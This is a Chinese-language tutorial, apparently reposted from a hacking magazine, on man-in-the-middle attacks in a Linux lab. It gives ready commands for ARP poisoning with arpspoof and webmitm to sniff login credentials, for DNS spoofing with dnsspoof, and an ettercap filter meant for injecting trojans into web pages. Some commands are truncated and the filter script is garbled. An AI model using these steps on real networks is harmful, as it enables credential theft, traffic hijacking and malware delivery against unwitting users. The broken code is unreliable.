浅谈linux下arp入侵南京廖华答案网

浅谈linux下arp入侵下载本文

文章发布时间 : 2025/4/6 12:47:46星期日

大家好，这次由我来给大家简单介绍下linux下的各种arp方法以及工具的使用。这次我们主要使用的是dsniff和Ettercap。关于他们的安装，网上内容很多，我就不介绍了，大家可以百度搜索。这里提醒大家注意下，需要根据本身系统的版本来找对应的安装程序 dsniff安装成功后，接下来就是实际的操作了。其中arp在win中最常见的就是目标网站信息的刺探，比如账号密码等，第二个就是内网的DNS欺骗，第三是挂马。我是通过虚拟机搭建的内网环境，本机用的是win7+apache+mysql，IP为192.168.10.233；虚拟机上，BT5的IP是192.168.10.100；还有台用来模拟访问的机器，为win2003，IP地址是192.168.10.120；网关地址为192.168.10.1。下面我会依次介绍这几种arp手法。

首先是目标信息的嗅探，在win中我们常用的是cain，而这次我们主要使用的是webmitm同时还要用arpspoof辅助。Webmitm可以用来劫持HTTP和HTTPS会话过程，捕获SSL的加密通信，但这次我们主要的目标还是HTTP方面。Dsniff中的arpspoof和win中的工具不同，他主要是持续不断的发送假的ARP相应给一台或者多台主机，但他本身不能进行进一步攻击。首先我们打开本机的路由转发功能：

echo \

接下来进行iptables规则的设置，其中包括在嗅探HTTPS时的设置了，这里一起介绍： iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT iptables -A FORWARD -j ACCEPT 跟着运行arpspoof，命令是:

arpspoof -i eth0 192.168.10.233 运行后，结果如图1。

可以看到，已经开始嗅探了。接着我们在新的终端中执行： webmitm -d

接下来我们会被要求填写一系列信息，这个不重要，基本填写“.”或者根据要求填写就行。这时候显示如图2。

说明已经开始监听。最后要做的就是把webmitm得到的信息输入到一个文本中，使用命令：

ssldump -n -d -k webmitm.crt | tee ssldump.log Ssldump.log就是输出的文件。

这时候，我们在233这台电脑上任意打开一个网站，都会发现BT5的终端中，数据迅速翻页，我们的http操作都会被记录，比如说我登陆黑客防线的网站，在登陆处输入账号echoeye，密码hellohack，在点击登陆。跟着我们将bt5中的ssldump.log复制到机器233上，方便查看，用notepad++打开，直接搜索echoeye，显示如图3。

我不过这里的密码已经被加密，在提交前就加密，应该是JS加密，这里就不研究啦。我们也可以搜索pass等关键字，迅速找到有效信息。

下面开始介绍arp中比较常见，但十分好使的一个攻击方式：DNS欺骗。DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。说的通俗点，就是你访问A网站，但并没能访问到A网站的IP，而是直接转到了攻击者所设定好的IP。这次我们使用的工具是dnsspoof。它也是dsniff工具集中的一个。dnsspoof依赖2个三方库：libpcap , libnet。当dnsspoof嗅探到局域网内有DNS请求数据包，它会分析其内容，并用伪造的DNS响应包来回复请求者。我们直接开始说明使用方法。首先我们建立个文件，文件名为“dnsspoof.hosts”名字是可以自定义的，只要后面执行命令时修改对应的参数就行，我们将该文件和dnsspoof放到一个文

件夹下，修改dnsspoof.hosts的内容为： 192.168.10.233 www.http://www.china-audit.com/ 意思是，将www.http://www.china-audit.com/的IP指定到192.168.10.233也就是我们本机搭建的那个web上，我们可以改成自己搭建好的网站IP就行，然后保存。跟着在终端中执行： dnsspoof -i eth0 -f ./dnsspoof.hosts。

注意下，这里的dnsspoof.host就是你自己修改的文件的文件名和地址了。显示结果如图4。

这里的意思已经开始监听，端口是53，其中192.168.10.101也就是本机是排除在外的，剩下的整个局域网都是被嗅探的范围。我再用机器120通过它访问百度，结果如图5。

显示的直接是我们233这台搭建的网站。这样就说明DNS欺骗成功了。可能有人会说，嗅探整个局域网范围太大，那么我们能不能指定一台机器呢？当然可以，命令是： dnsspoof -i eth0 -f ./dnsspoof.hosts src 192.168.10.120

这时显示：dnsspoof: listening on eth0 [src 192.168.10.120]，说明这是针对120机器的DNS欺骗了，在第一次的命令中，如果我们在机器233上访问百度，也是会被转向的，但现在已经可以正常访问了，限于篇幅，我就不在重复了，这个大家可以自己去实验。跟着介绍的就是挂马了，不过我不提倡挂马，这种方法危险度很高。这里只是做个介绍，大家了解下也能更容易防范。

这次我们用到的工具是ettercap。Ettercap 是中间人攻击的一整套工具，他可以自己编写过滤规则，这次我用的就是这个功能，首先我们写一个自己的过滤脚本。这里我给出 Mickey的以及网上的，两种都可以大家自己选择。

Mickey：

if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data,”Accept-Encoding”)) { replace(“Accept-Encoding”,”Accept-Mousecat”); msg(“zapped Accept-Encoding!\\n”); } }

if (ip.proto == TCP && tcp.src == 80) {

replace(“”,” ” “); replace(“”,” ” “); msg(“Filter Ran.\\n”); }

Word文档下载：浅谈linux下arp入侵.doc

搜索更多:浅谈linux下arp入侵